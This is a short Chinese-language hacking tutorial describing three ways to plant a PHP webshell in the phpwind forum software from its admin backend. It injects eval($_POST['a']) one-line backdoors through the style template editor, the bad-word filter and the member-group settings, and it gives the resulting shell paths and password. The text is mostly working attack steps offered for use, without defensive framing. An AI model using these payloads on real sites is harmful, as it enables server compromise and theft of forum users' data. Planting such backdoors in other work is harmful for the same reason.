phpwind从后台拿webshell的三种方式

方式1 模板法

进入后台, 风格模版设置 ,在随便一行写代码
记住,这代码必须顶着左边行写,代码前面不可以有任何字符。
EOT;
eval($a);
print << 例如,我写完某一行为。 .headurl { color:#ffffff;} EOT; eval($_POST[’a’]); print <<.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;} 而后得到一个shell http://localhost/bbs/index.php (由于写到css里,也许有的操作无法返回,但是只要没有什么问题,一般操作都是可以接受的) 密码是a lanker的一句话后门。 方式2 脏话过滤法 进入安全管理 ◇ 不良词语过滤 新增 不良词语写 a’]=’aa’;eval($_POST[’a’]);// 替换为那里可以随意写 而后得到一个shell地址为 http://localhost/bbs/data/bbscache/wordsfb.php 密码是a lanker的一句话后门。 方式3 用户等级管理 然后新建立会员组 头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a’;eval($_POST[’a’]);// 升级点数依然可以随意写。 而后得到一个shell地址为 http://localhost/bbs/data/bbscache/level.php 密码是a lanker的一句话后门。 这里提供的方式随便你选一种都可以得到shell。。。 方式三请按说明仔细操作,否则会导致论坛无法正常运行,后果,自负。

Related Posts